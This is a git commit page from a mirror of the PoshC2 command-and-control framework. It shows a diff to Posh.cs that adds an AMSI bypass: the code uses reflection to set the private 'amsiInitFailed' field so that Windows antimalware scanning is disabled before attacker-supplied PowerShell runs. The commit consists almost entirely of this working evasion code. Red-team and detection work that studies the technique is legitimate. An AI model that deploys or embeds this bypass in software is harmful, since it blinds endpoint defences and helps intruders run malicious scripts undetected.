infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated to include AMSI Bypass

chunking
benpturner 2018-08-01 10:18:03 +01:00
parent 8e780e7d4b
commit 42a9917a19
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Files/Posh.cs
View File

@ -34,6 +34,12 @@ public class Program
Runspace newrunspace = RunspaceFactory.CreateRunspace();
newrunspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
try
{
var amsi = scriptInvoker.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
amsifield.SetValue(null, true);
} catch { }
Pipeline pipeline = newrunspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);